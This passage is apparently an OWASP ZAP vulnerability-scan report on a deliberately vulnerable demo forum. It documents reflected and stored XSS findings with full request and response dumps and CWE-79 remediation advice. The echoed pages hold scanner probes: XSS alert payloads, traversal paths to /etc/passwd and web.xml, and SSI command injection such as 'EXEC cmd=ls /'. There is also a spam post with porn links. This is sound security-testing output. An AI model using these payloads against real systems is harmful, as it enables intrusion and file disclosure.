<form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| Instances | 2 |
| Solution |
Phase: Architecture and Design
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
Phases: Implementation; Architecture and Design
Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.
For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.
Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.
Phase: Architecture and Design
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
Phase: Implementation
For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.
To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
|
| Reference |
http://projects.webappsec.org/Cross-Site-Scripting
http://cwe.mitre.org/data/definitions/79.html |
| Tags |
OWASP_2021_A03
WSTG-v42-INPV-02 OWASP_2017_A07 |
| CWE Id | 79 |
| WASC Id | 8 |
| Plugin Id | 40014 |
|
High |
Cross Site Scripting (Reflected) |
|---|---|
| Description |
Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.
When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.
There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.
Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.
Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.
|
| URL | http://testasp.vulnweb.com/Search.asp?tfSearch=%22%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E |
| Method | GET |
| Parameter | tfSearch |
| Attack | "><scrIpt>alert(1);</scRipt> |
| Evidence | "><scrIpt>alert(1);</scRipt> |
| Request Header - size: 396 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=%22%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:55:58 GMT Content-Length: 5422 |
| Response Body - size: 5,422 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%2522%253E%253CscrIpt%253Ealert%25281%2529%253B%253C%252FscRipt%253E" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%2522%253E%253CscrIpt%253Ealert%25281%2529%253B%253C%252FscRipt%253E" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <div class='path'>You searched for '"><scrIpt>alert(1);</scRipt>'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='path'>Found in: <a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a>/<a href='showthread.asp?id=40'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn</a></div><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='path'>Found in: <a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a>/<a href='showthread.asp?id=40'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn</a></div><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/1'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='path'>Found in: <a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a>/<a href='showthread.asp?id=40'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn</a></div><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/2'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='path'>Found in: <a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a>/<a href='showthread.asp?id=40'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn</a></div><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/3'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='path'>Found in: <a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a>/<a href='showthread.asp?id=40'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn</a></div><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>/</div></td></tr></table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | POST |
| Parameter | tfText |
| Attack | </a><scrIpt>alert(1);</scRipt><a> |
| Evidence | </a><scrIpt>alert(1);</scRipt><a> |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Content-Length: 80 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 80 bytes. |
tfSubject=ZAP&tfText=%3C%2Fa%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E%3Ca%3E
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:55:52 GMT Content-Length: 16921 |
| Response Body - size: 16,921 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout 0W45pz4p</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:03 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>c:/Windows/system.ini</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:03 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>../../../../../../../../../../../../../../../../Windows/system.ini</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:03 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>c:\Windows\system.ini</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>/etc/passwd</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>../../../../../../../../../../../../../../../../etc/passwd</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>c:/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>c:\</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:06 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>../../../../../../../../../../../../../../../../</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:06 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>WEB-INF/web.xml</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:06 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>WEB-INF\web.xml</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:06 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>/WEB-INF/web.xml</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:07 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>\WEB-INF\web.xml</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>\WEB-INF\web.xml</b> on 3/14/2022 7:54:07 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>thishouldnotexistandhopefullyitwillnot</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:45 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http://www.google.com/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:45 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http://www.google.com:80/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:46 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http://www.google.com</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:46 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http://www.google.com/search?q=OWASP%20ZAP</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:46 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http://www.google.com:80/search?q=OWASP%20ZAP</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:47 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>www.google.com/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:47 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>www.google.com:80/</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:47 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>www.google.com</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:47 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>www.google.com/search?q=OWASP%20ZAP</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>www.google.com:80/</b> on 3/14/2022 7:54:48 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>www.google.com:80/search?q=OWASP%20ZAP</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:11 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:12 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http://73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:12 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>https://73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:12 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>http:\\73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:12 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>https:\\73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:13 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>//73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:13 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>\\73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:13 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>HtTp://73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 7:55:14 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>HtTpS://73982610993231700.owasp.org</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b><!--#EXEC cmd="dir \"--></b> on 3/14/2022 7:55:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'><!--#EXEC cmd="ls /"--></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b><!--#EXEC cmd="dir \"--></b> on 3/14/2022 7:55:36 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>"><!--#EXEC cmd="ls /"--><</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b><!--#EXEC cmd="dir \"--></b> on 3/14/2022 7:55:36 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'><!--#EXEC cmd="dir \"--></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b><!--#EXEC cmd="dir \"--></b> on 3/14/2022 7:55:36 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>"><!--#EXEC cmd="dir \"--><</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>0W45pz4p</b> on 3/14/2022 7:55:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>0W45pz4p</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>0W45pz4p</b> on 3/14/2022 7:55:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'></a><scrIpt>alert(1);</scRipt><a></div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| Instances | 2 |
| Solution |
Phase: Architecture and Design
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
Phases: Implementation; Architecture and Design
